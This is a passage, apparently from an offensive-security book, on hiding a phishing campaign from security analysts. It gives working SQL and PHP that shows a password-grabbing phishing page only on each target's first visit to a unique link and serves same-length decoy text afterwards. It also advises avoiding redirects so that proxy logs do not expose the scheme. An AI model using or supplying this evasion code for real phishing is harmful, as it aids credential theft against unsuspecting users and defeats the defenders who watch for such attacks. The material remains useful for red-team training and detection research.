Diverting the Analysts

If we have used the steps in sections before to create a unique link for each user, we can divert the analysts atention.

To prevent any suspicious analysts from seeing our site and blowing our cover, we will add a small diversion: bootstrap code that follows some basic logic to decide whether or not to display the phishing page.

Each user who gets the phishing email, by design, gets a unique URL to our secret page thanks to the encrypted name incorporated in the utm_term parameter, so the URL will only be viewed once by each user.

To carry off this ruse, we first create a SQL table with four columns: a row ID; the utm_term token's value, which is the encrypted target name; a counter to track visits; and finally the date of the first visit.

Here is the SQL code to create the table schema and load the encrypted tokens:

root@Phishing:~# mysql -u root -p

mysql> CREATE TABLE tokens (

id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,

utmterm VARCHAR(100) NOT NULL,

counter smallint,

updated_at datetime

);

mysql> INSERT into tokens values (null, "FAgUHRNXNjo6FjtM", 0, null);

mysql> INSERT into tokens values (null, "AwgQFR9XITw7AyBdIQ==", 0, null);

--snip--

Next, we need some bootstrap PHP code.

If the page has already been visited by this user (counter > 0), it loads dummy content that has exactly the same length as the password- grabbing form. If the user hasn't yet visited the page, it serves the actual phishing page.

Avoid using redirections. An analyst looking at proxy data could potentially spot the discrepancy between users successfully load- ing the page the first time (HTTP code 200) and those same users failing to revisit it again (HTTP code 302).

PHP code to determine whether a user should be served the phishing page or redirected to the home page:

// If no utm_term token or if it's empty, redirect to main page
if (!isset($_GET['utm_term']) or empty($_GET['utm_term'])){
	header('Location: /');
}

// Establish a MySQL connection
$db = new PDO('mysql: host=localhost; dbname=catalog_db3; charset=utf8mb4', 'wp_user', 'Kja9880: Lkaz098');

// Fetch the count field from the database tied to the specified utm_term parameter
$stmt = $db->prepare("SELECT * FROM tokens WHERE utmterm=:utmterm");
$stmt->execute(array(": utmterm" => $_GET['utm_term']));

// If page viewed first time display earlier form
if ($row = $stmt->fetch (PDO:: FETCH_ASSOC)
	and $row['counter'] == 0) {

	// PASTE FORM GRABBING CODE FROM SITE BUILDING SECTION
	
// Increment the counter now that the page has been displayed
$stmt2 = $db->prepare("UPDATE tokens set counter = 1, reg_date=NOW() WHERE utmterm=:utmterm");

$res = $stmt2->execute(array(":utmterm" => $_GET['utm_term']));

// If no matching token is found, then it was tampered with so
// we redirect to the home page
} else if (!$row) { header('Location: /');

// If the user visits a second time, show the usual error with padding
} else {
echo "The plug-in will be available in a couple of days in your region, please come back soon!";}